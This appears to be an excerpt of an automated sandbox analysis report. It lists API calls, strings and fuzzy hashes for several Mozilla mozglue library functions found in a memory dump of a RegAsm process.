                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$Leave$Enter$Virtual$Free$Alloc
                                                                            • String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_CRASH()
                                                                            • API String ID: 2380290044-2272602182
                                                                            • Opcode ID: 457a1ab6eeece82258b6966f44ac4e4294e178f41e189859bed05e66ddc0cd48
                                                                            • Instruction ID: 1a0926d48a7e4d61aacb776ee7f06460a4d9f23debd1fc304d0061b72f735fca
                                                                            • Opcode Fuzzy Hash: 457a1ab6eeece82258b6966f44ac4e4294e178f41e189859bed05e66ddc0cd48
                                                                            • Instruction Fuzzy Hash: 7491E771B002148FDB04CFA9E8D475A77B2FF85714B285668E41AABB81F771E802CBD5
                                                                            Function 6CC47FD0 Relevance: 24.2, APIs: 16, Instructions: 166COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • K32EnumProcessModules.KERNEL32(000000FF,00000000,00000000,?), ref: 6CC48007
                                                                            • moz_xmalloc.MOZGLUE(?,000000FF,00000000,00000000,?), ref: 6CC4801D
                                                                              • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                            • memset.VCRUNTIME140(00000000,00000000,?,?), ref: 6CC4802B
                                                                            • K32EnumProcessModules.KERNEL32(000000FF,00000000,?,?,?,?,?,?), ref: 6CC4803D
                                                                            • moz_xmalloc.MOZGLUE(00000104,000000FF,00000000,?,?,?,?,?,?), ref: 6CC4808D
                                                                              • Part of subcall function 6CC4CA10: mozalloc_abort.MOZGLUE(?), ref: 6CC4CAA2
                                                                            • memset.VCRUNTIME140(00000000,00000000,00000104,?,?,?,?,?), ref: 6CC4809B
                                                                            • GetModuleFileNameW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6CC480B9
                                                                            • moz_xmalloc.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6CC480DF
                                                                            • memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC480ED
                                                                            • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC480FB
                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC4810D
                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6CC48133
                                                                            • free.MOZGLUE(00000000,000000FF,00000000,?,?,?,?,?,?), ref: 6CC48149
                                                                            • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?), ref: 6CC48167
                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 6CC4817C
                                                                            • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC48199
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: free$memsetmoz_xmalloc$EnumModulesProcess$ErrorFileLastModuleNamemallocmozalloc_abortwcscpy_s
                                                                            • String ID:
                                                                            • API String ID: 2721933968-0
                                                                            • Opcode ID: 8f415ae40f9ab42d0608a286f46ed1209a72dbb847ddffdd64661b2790504f05
                                                                            • Instruction ID: 4cd7d63cff29f2e1093a616d45f45fd7a678a30df627b810b33d07ad6d71f922
                                                                            • Opcode Fuzzy Hash: 8f415ae40f9ab42d0608a286f46ed1209a72dbb847ddffdd64661b2790504f05
                                                                            • Instruction Fuzzy Hash: 895183B2E002149BDB00DBA9DC84AEFB7B9AF49364F148126E815E7741F735A905CBA1
                                                                            Function 6CC411B0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 186COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcpy.VCRUNTIME140(?,Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32,00000084), ref: 6CC41213
                                                                            • toupper.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CC41285
                                                                            • memcpy.VCRUNTIME140(?,TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32,00000076), ref: 6CC412B9
                                                                            • memcpy.VCRUNTIME140(?,CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32,00000078,?), ref: 6CC41327
                                                                            Strings
                                                                            • CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32, xrefs: 6CC4131B
                                                                            • &, xrefs: 6CC4126B
                                                                            • TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32, xrefs: 6CC412AD
                                                                            • MZx, xrefs: 6CC411E1
                                                                            • Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32, xrefs: 6CC4120D
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$toupper
                                                                            • String ID: &$CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32$Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32$MZx$TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32
                                                                            • API String ID: 403083179-3658087426
                                                                            • Opcode ID: 3e16fd5c83407ce78f9cf1b38fa99cadf590d9b6a752389335596af92aa2c3e2
                                                                            • Instruction ID: 1afe90019d4850eedea6f23d10d6e6cb27e7957bd05694e60a6a7139557b1260
                                                                            • Opcode Fuzzy Hash: 3e16fd5c83407ce78f9cf1b38fa99cadf590d9b6a752389335596af92aa2c3e2
                                                                            • Instruction Fuzzy Hash: 8D71D671E013548ADB109FB8C8447DEB7F5BF44309F04865ED585A3B40FB34AAA9CBA2
                                                                            Function 6CC331C0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 183timelibraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6CC33217
                                                                            • GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6CC33236
                                                                            • FreeLibrary.KERNEL32 ref: 6CC3324B
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC33260
                                                                            • ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6CC3327F
                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC3328E
                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC332AB
                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC332D1
                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CC332E5
                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6CC332F7
                                                                              • Part of subcall function 6CC6AB89: EnterCriticalSection.KERNEL32(6CCBE370,?,?,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB94
                                                                              • Part of subcall function 6CC6AB89: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6ABD1
                                                                            • __aulldiv.LIBCMT ref: 6CC3346B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Time$StampV01@@Value@mozilla@@$CriticalLibrarySectionStamp@mozilla@@$AddressCreation@EnterFreeInit_thread_footerLeaveLoadNow@ProcProcessV12@V12@___aulldiv
                                                                            • String ID: KernelBase.dll$QueryInterruptTime
                                                                            • API String ID: 3006643210-2417823192
                                                                            • Opcode ID: 24d0bffebbf9098df0dd450c23b91b6a6a62f61fec522b2f71c3558530eb498e
                                                                            • Instruction ID: 1c94c05127b750f9548ece4308760e28e0583b76498d4b895636a058bacb5580
                                                                            • Opcode Fuzzy Hash: 24d0bffebbf9098df0dd450c23b91b6a6a62f61fec522b2f71c3558530eb498e
                                                                            • Instruction Fuzzy Hash: 4D611F71A087418BCB11CF78C45065AB7F4BFC6354F248B1DF8A9A3A91EB30A54A8B46
                                                                            Function 6CC96660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 162threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InitializeCriticalSection.KERNEL32(6CCBF618), ref: 6CC96694
                                                                            • GetThreadId.KERNEL32(?), ref: 6CC966B1
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC966B9
                                                                            • memset.VCRUNTIME140(?,00000000,00000100), ref: 6CC966E1
                                                                            • EnterCriticalSection.KERNEL32(6CCBF618), ref: 6CC96734
                                                                            • GetCurrentProcess.KERNEL32 ref: 6CC9673A
                                                                            • LeaveCriticalSection.KERNEL32(6CCBF618), ref: 6CC9676C
                                                                            • GetCurrentThread.KERNEL32 ref: 6CC967FC
                                                                            • memset.VCRUNTIME140(?,00000000,000002C8), ref: 6CC96868
                                                                            • RtlCaptureContext.NTDLL ref: 6CC9687F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
                                                                            • String ID: WalkStack64
                                                                            • API String ID: 2357170935-3499369396
                                                                            • Opcode ID: 05ce91893531c86a705ee82389ca70b4f55f63aa736e457722385bd767acdf9d
                                                                            • Instruction ID: af78d29077be33a60a17b64599f805b13a55f32f750c1917ff7349afd26404fb
                                                                            • Opcode Fuzzy Hash: 05ce91893531c86a705ee82389ca70b4f55f63aa736e457722385bd767acdf9d
                                                                            • Instruction Fuzzy Hash: BC51DB71A09701AFDB51CFA4C884B5ABBF4BF89714F00492DF89887690E770E908CB96
                                                                            Function 6CC7DE60 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 135threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                              • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7DE73
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7DF7D
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7DF8A
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7DFC9
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7DFF7
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7E000
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6CC44A68), ref: 6CC7DE7B
                                                                              • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                              • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
                                                                              • Part of subcall function 6CC6CBE8: GetCurrentProcess.KERNEL32(?,6CC331A7), ref: 6CC6CBF1
                                                                              • Part of subcall function 6CC6CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC331A7), ref: 6CC6CBFA
                                                                            • ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6CC44A68), ref: 6CC7DEB8
                                                                            • free.MOZGLUE(00000000,?,6CC44A68), ref: 6CC7DEFE
                                                                            • ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6CC7DF38
                                                                            Strings
                                                                            • <none>, xrefs: 6CC7DFD7
                                                                            • [I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6CC7E00E
                                                                            • [I %d/%d] locked_profiler_stop, xrefs: 6CC7DE83
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
                                                                            • String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
                                                                            • API String ID: 1281939033-809102171
                                                                            • Opcode ID: a4a944557c9bb55f58dc34e4d826ad57f3f53a1b717694da40663c698f470f64
                                                                            • Instruction ID: bbb3ebcb5fecd236de531b9bf4561cf1e43243eb28dd6efe89c0c29d5eca5e3e
                                                                            • Opcode Fuzzy Hash: a4a944557c9bb55f58dc34e4d826ad57f3f53a1b717694da40663c698f470f64
                                                                            • Instruction Fuzzy Hash: DA41D13DB012119FDB209FA9D8587AAB775EB8630CF144019E90997F01EB71AC05CBFA
                                                                            Function 6CC8D840 Relevance: 21.2, APIs: 14, Instructions: 206threadtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC8D85F
                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC8D86C
                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC8D918
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC8D93C
                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC8D948
                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC8D970
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC8D976
                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC8D982
                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC8D9CF
                                                                            • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6CC8DA2E
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC8DA6F
                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC8DA78
                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE ref: 6CC8DA91
                                                                              • Part of subcall function 6CC55C50: GetTickCount64.KERNEL32 ref: 6CC55D40
                                                                              • Part of subcall function 6CC55C50: EnterCriticalSection.KERNEL32(6CCBF688), ref: 6CC55D67
                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC8DAB7
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Count64CriticalEnterSectionStampTickTimeV01@@Value@mozilla@@Xbad_function_call@std@@
                                                                            • String ID:
                                                                            • API String ID: 1195625958-0
                                                                            • Opcode ID: 85d5bae015983f66aef01da2e1c4f1a4f2ff76356281145a34a7d5830562678a
                                                                            • Instruction ID: e46abd5caba052722e54fcc871b490c89618e6130c17c4d8554c6d930661f241
                                                                            • Opcode Fuzzy Hash: 85d5bae015983f66aef01da2e1c4f1a4f2ff76356281145a34a7d5830562678a
                                                                            • Instruction Fuzzy Hash: 5371CC716043059FCB00CF69C898B9ABBF5FF89318F15856EF85A9B311EB30A945CB91
                                                                            Function 6CC8D4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC8D4F0
                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC8D4FC
                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC8D52A
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC8D530
                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC8D53F
                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC8D55F
                                                                            • free.MOZGLUE(00000000), ref: 6CC8D585
                                                                            • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6CC8D5D3
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC8D5F9
                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC8D605
                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC8D652
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC8D658
                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC8D667
                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC8D6A2
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                                                            • String ID:
                                                                            • API String ID: 2206442479-0
                                                                            • Opcode ID: 9c4a39e64d61966d01172d39e24b93c32d3f1e9b99b0c386e7cbdc494dfd4444
                                                                            • Instruction ID: 6b8429217441f5d062c37c545a1846f654b366f4165faeed9df6732add8e392b
                                                                            • Opcode Fuzzy Hash: 9c4a39e64d61966d01172d39e24b93c32d3f1e9b99b0c386e7cbdc494dfd4444
                                                                            • Instruction Fuzzy Hash: D3516AB16057059FC704DF75C898A9ABBB4FF89318F108A2EE84A87711EB30A945CB95
                                                                            Function 6CC55670 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 272timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6CC556D1
                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC556E9
                                                                            • ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6CC556F1
                                                                            • ?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6CC55744
                                                                            • ??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6CC557BC
                                                                            • GetTickCount64.KERNEL32 ref: 6CC558CB
                                                                            • EnterCriticalSection.KERNEL32(6CCBF688), ref: 6CC558F3
                                                                            • __aulldiv.LIBCMT ref: 6CC55945
                                                                            • LeaveCriticalSection.KERNEL32(6CCBF688), ref: 6CC559B2
                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6CCBF638,?,?,?,?), ref: 6CC559E9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
                                                                            • String ID: MOZ_APP_RESTART
                                                                            • API String ID: 2752551254-2657566371
                                                                            • Opcode ID: e840d3b08470c7dc352ec84a4d26bcb77a8a9f5bec8b314b05cb6f434263e41d
                                                                            • Instruction ID: 12408110a06ff88b6264ba13c981f0291965a2d368dcbb3d891aac047f195198
                                                                            • Opcode Fuzzy Hash: e840d3b08470c7dc352ec84a4d26bcb77a8a9f5bec8b314b05cb6f434263e41d
                                                                            • Instruction Fuzzy Hash: 6DC19B79A083419FCB05CF68C44066ABBF1BFDA714F458A1DE8C497760E730E895CB86
                                                                            Function 6CC7EC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                              • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7EC84
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7EC8C
                                                                              • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                              • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7ECA1
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7ECAE
                                                                            • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6CC7ECC5
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7ED0A
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CC7ED19
                                                                            • CloseHandle.KERNEL32(?), ref: 6CC7ED28
                                                                            • free.MOZGLUE(00000000), ref: 6CC7ED2F
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7ED59
                                                                            Strings
                                                                            • [I %d/%d] profiler_ensure_started, xrefs: 6CC7EC94
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                            • String ID: [I %d/%d] profiler_ensure_started
                                                                            • API String ID: 4057186437-125001283
                                                                            • Opcode ID: 0b5f746ca30ce80bc79f34900e728158a2a719addba06bcce23a0810fa68d7c2
                                                                            • Instruction ID: 07281a793eb7ed1c1053609bf6e718834aecc0d9380b5e9f9dcdcdc33db649e5
                                                                            • Opcode Fuzzy Hash: 0b5f746ca30ce80bc79f34900e728158a2a719addba06bcce23a0810fa68d7c2
                                                                            • Instruction Fuzzy Hash: 3C21F17E600118AFDB109FA8D848ADAB779FF4626CF104214FC1897B41FB719C158BB9
